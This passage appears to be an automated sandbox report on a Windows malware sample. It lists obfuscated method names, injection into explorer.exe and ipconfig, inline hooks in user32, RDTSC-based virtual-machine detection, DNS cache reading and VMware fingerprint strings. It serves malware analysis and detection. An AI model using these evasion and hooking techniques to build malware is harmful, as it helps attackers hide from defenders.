Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, zkamj8fyjUFsj4DNVS.cs	High entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, RlRY3MtuqSyeeD1ltL.cs	High entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, oYWDQbVoSt3rrZLCP8.cs	High entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, TFoKLcY3ARFt2FB1fbQ.cs	High entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VktMXjAK6HSiWFAtLS.cs	High entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, I75gnI2kL9ppKmFoA0.cs	High entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, NaFpgHhPZjkBVhYoCC.cs	High entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, lrimIHsJxt3UWxuIeo.cs	High entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, lZf4Py4jUCe74NUT5g.cs	High entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, BbLeYsClKqdpZlysFh.cs	High entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	High entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, iAtTLKaUooI6ORehwu.cs	High entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, EjsN49YM3I6qvqaWLoa.cs	High entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs	High entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, rW5l9Ror7rYmm0uNHK.cs	High entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, xrCaFdyNl8mr4igEg1.cs	High entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, PwqSttQ2Ue8TWoP6rF.cs	High entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, ntQV3lM3nQNvti1MVn.cs	High entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, vSttqFiNx4yhRVEK5W.cs	High entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, zkamj8fyjUFsj4DNVS.cs	High entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, RlRY3MtuqSyeeD1ltL.cs	High entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, oYWDQbVoSt3rrZLCP8.cs	High entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, TFoKLcY3ARFt2FB1fbQ.cs	High entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VktMXjAK6HSiWFAtLS.cs	High entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, I75gnI2kL9ppKmFoA0.cs	High entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, NaFpgHhPZjkBVhYoCC.cs	High entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, lrimIHsJxt3UWxuIeo.cs	High entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, lZf4Py4jUCe74NUT5g.cs	High entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, BbLeYsClKqdpZlysFh.cs	High entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	High entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, iAtTLKaUooI6ORehwu.cs	High entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, EjsN49YM3I6qvqaWLoa.cs	High entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs	High entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, rW5l9Ror7rYmm0uNHK.cs	High entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, xrCaFdyNl8mr4igEg1.cs	High entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, PwqSttQ2Ue8TWoP6rF.cs	High entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, ntQV3lM3nQNvti1MVn.cs	High entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEF

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTR

Reads the DNS cache

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 7_2_00C73872 DnsGetCacheDataTableEx,DnsFree,DnsFree,

7_2_00C73872

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 1D9B7E second address: 1D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 10C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 4C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 7A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 8A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Memory allocated: 9D00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4662	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5264	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 890	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 859	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 9800	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13836

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 1.5 %

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5916	Thread sleep count: 4662 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5916	Thread sleep time: -9324000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5916	Thread sleep count: 5264 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5916	Thread sleep time: -10528000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028	Thread sleep count: 170 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028	Thread sleep time: -340000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028	Thread sleep count: 9800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028	Thread sleep time: -19600000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.3838977700.000000000888E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: explorer.exe, 00000006.00000002.3839674348.0000000008979000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00`
Source: explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
Source: explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: explorer.exe, 00000006.00000000.1359952336.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
